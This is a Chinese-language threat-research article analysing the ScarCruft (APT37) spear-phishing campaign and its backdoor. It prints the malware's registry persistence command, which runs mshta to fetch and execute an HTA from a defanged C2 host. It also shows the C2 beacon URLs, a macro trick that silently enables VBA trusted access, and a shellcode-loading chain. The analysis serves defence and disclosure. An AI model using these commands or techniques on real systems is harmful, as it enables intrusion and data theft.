ScarCruft不断进化，监视目标的能力越来越强（上）

ScarCruft组织(也被称为APT37或Temp.Reaper)是卡巴斯基实验室的研究人员在2016年首次发现的一个APT组织。据悉，ScarCruft被业内认定为是由国家赞助的黑客组织，针对在朝鲜半岛开展业务的政府机构部门。最近研究人员发现，有些攻击目标被PowerShell恶意程序感染了，证据表明，攻击者已经从攻击目标那里窃取了数据，并监视了攻击目标几个月。

对受感染设备的调查结果是，他们发现了其他恶意程序。攻击者使用了三种具有类似功能的恶意程序：在 PowerShell 中实现的版本、Windows 可执行文件和 Android 应用程序。尽管针对的是不同的平台，但它们共享基于 HTTP 通信的类似命令和控制方案。因此，恶意程序操作者可以通过一组命令和控制脚本来控制整个恶意程序家族。

研究人员与本地CERT密切合作，调查攻击者的命令和控制基础设施，因此，研究人员能够更好地理解它是如何工作的。APT运营商在被攻击的web服务器上使用PHP脚本控制恶意程序，并根据HTTP参数控制植入程序。他们还从被攻击的服务器上获取了几个日志文件。根据这些文件，研究人员确认了在韩国的其他攻击目标，并发现了 ScarCruft 自 2021 年初以来一直在使用的 Web 服务器。此外，研究人员发现了该恶意程序的较老版本，通过HWP文件交付，可追溯到2020年年中。

鱼叉式网络钓鱼文件

在对潜在的攻击目标进行鱼叉式网络钓鱼并发送恶意文件之前，攻击者使用攻击目标被盗的Facebook账户联系了攻击目标的熟人。攻击者已经知道潜在目标经营与朝鲜有关的业务，并询问其现状。在社交媒体上进行对话后，该攻击者使用被盗的电子邮件帐户向潜在攻击目标发送了一封鱼叉式网络钓鱼电子邮件。该攻击者使用被盗的登录凭据（例如 Facebook 和个人电子邮件帐户）进行攻击，这表现了其攻击手段的复杂性。

在 Facebook 对话之后，潜在攻击目标收到了来自该攻击者的鱼叉式网络钓鱼电子邮件。它包含一个受密码保护的 RAR 档案，密码显示在电子邮件正文中。 RAR文件包含一个恶意的Word文件。

鱼叉式网络钓鱼电子邮件和诱饵

该文件中包含了与朝鲜有关的诱饵。

此文件包含一个恶意宏和一个用于多阶段感染过程的有效载荷。第一阶段的宏包含模糊的字符串，然后生成另一个宏作为第二阶段。

第一阶段宏通过尝试以下文件路径检查攻击目标设备上是否存在卡巴斯基安全解决方案:

C:\Windows\avp.exe # Kaspersky AV
C:\Windows\Kavsvc.exe # Kaspersky AV
C:\Windows\clisve.exe # Unknown

如果系统上确实安装了卡巴斯基安全解决方案，它可以通过将以下注册表项设置为“1”来启用Visual Basic Application (VBA)的信任访问：

HKEY_CURRENT_USER\Software\Microsoft\Office\[Application.Version]\Word\Security\AccessVBOM

Microsoft Office 将信任所有宏并运行任何代码，而不会显示安全警告或需要用户许可。接下来，宏创建一个名为“sensiblemtv16n”的互斥锁，并再次打开恶意文件。由于“信任所有宏”设置，宏将自动执行。

如果没有安装卡巴斯基安全程序，宏直接继续解密下一阶段的有效载荷。为了实现这一点，它使用了一种替换方法的变体。该脚本将给定的加密字符串与第二个字符串进行比较，以获得匹配字符的索引。接下来，它接收一个解密的字符，该字符具有从第一个字符串获得的索引。

第一个字符串：BU+13r7JX9A)dwxvD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V&tC,uYz=Z0RS8aM4Fqn

第二个字符串：v&tC,uYz=Z0RS8aM4FqnD5h2WpQOGfbmNKPcLelj(kogHs.#yi*IET6V7JX9A)dwxBU+13r

解密的第二阶段Visual Basic应用程序(VBA)包含shellcode作为十六进制字符串。该脚本负责将shellcode注入进程notepad.exe中。

第二阶段 VBA 中的 Shellcode

shellcode包含获取下一阶段有效载荷的URL。在获取有效载荷后，shellcode使用简单的单字节XOR解密对其进行解密。不幸的是，当研究人员调查这个样本时，研究人员不能收集最后的有效载荷。

有效载荷的下载路径为：

hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4VHg/root/content

主机的调查

由于研究人员努力帮助攻击目标进行分析，因此有机会调查发送鱼叉式钓鱼邮件的所有者的主机。当研究人员第一次检查进程列表时，有一个可疑的PowerShell进程正在运行，其参数相当可疑。

这个PowerShell命令是通过Run注册表键作为持久性机制注册的:

注册表路径:HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - ONEGO

c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 300000 2.2.2.2 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html

每次系统启动时，此注册表项都会导致 mshta.exe 进程获取并执行 HTML 应用程序 (HTA) 文件。获取的“1.html”是一个 HTML 应用程序 (.hta) 文件，其中包含最终执行 PowerShell 命令的 Visual Basic 脚本 (VBS)。

PowerShell 脚本提供简单的后门功能，并使用包含多个参数的 HTTP POST 请求不断查询 C2 服务器。首先，它使用主机名向 C2 服务器发送信标：

hxxp://[redacted].cafe24[.]com/bbs/probook/do.php?type=hello&direction=send&id=[host name]

接下来，它尝试使用以下格式从 C2 服务器下载命令：

hxxp://[redacted].cafe24[.]com/bbs/probook/do.php??type=command&direction=receive&id=

如果来自 C2 服务器的 HTTP 响应是 200，它会检查响应数据并执行传递的命令。

研究人员从攻击目标的主机中发现了其他恶意程序、工具和被盗文件。由于对受感染主机的访问受限，研究人员无法找出最初的感染媒介。但是，研究人员根据可疑文件的时间戳评估该主机在 2021 年 3 月 22 日遭到攻击。研究人员从攻击目标身上发现的恶意程序的一个特征是将命令的执行结果写入文件“%appdata%\desktop.dat”。根据主文件表 (MFT) 信息，该文件创建于 2021 年 3 月 22 日同一天，最后修改时间为 2021 年 9 月 8 日，也就是说该文件一直使用到研究人员调查之前。

恶意程序操作者使用其他工具从攻击目标那里收集了敏感信息，尽管研究人员无法准确评估有多少数据被窃取，以及哪些数据被窃取。但根据该恶意程序创建的文件夹和文件的时间戳，该攻击者早在2021年8月就收集并窃取了文件。扩展名为 .dat 的日志文件已加密，但可以使用一字节 XOR 密钥 0x75 解密。这些日志文件包含上传历史记录。研究人员找到了两个日志文件，每个文件都包含略有不同的日志。 “B14yNKWdROad6DDeFxkxPZpsUmb.dat”文件包含同名文件夹的压缩和上传。日志文件将进程显示为：“Zip Dir Start > Up Init > Up Start > Up File Succeed > Zip Dir Succeed”。根据日志文件，恶意程序操作者从该文件夹中的受感染系统中收集了一些内容，并在存档后上传。

文件归档和上传日志

另一个名为“s5gRAEs70xTHkAdUjl_DY1fD.dat”的日志文件也包含文件上传历史记录，除了文件压缩消息，它使用以下程序处理每个文件：“Up Init > Up Start > Up File Succeed”。

文件上传日志

根据研究人员在攻击目标身上的发现，可以确定恶意程序操作员在2021年8月6日至2021年9月8日期间收集并窃取了这些截图。根据研究人员从攻击目标身上发现的信息，可以总结出整个感染时间线。研究人员怀疑该主机在 2021 年 3 月 22 日遭到攻击。最初感染后，攻击者尝试植入其他恶意程序，但发生错误导致恶意程序崩溃。恶意程序运营商后来于 2021 年 8 月发布了 Chinotto 恶意程序，并可能开始从攻击目标那里窃取敏感数据。

攻击时间表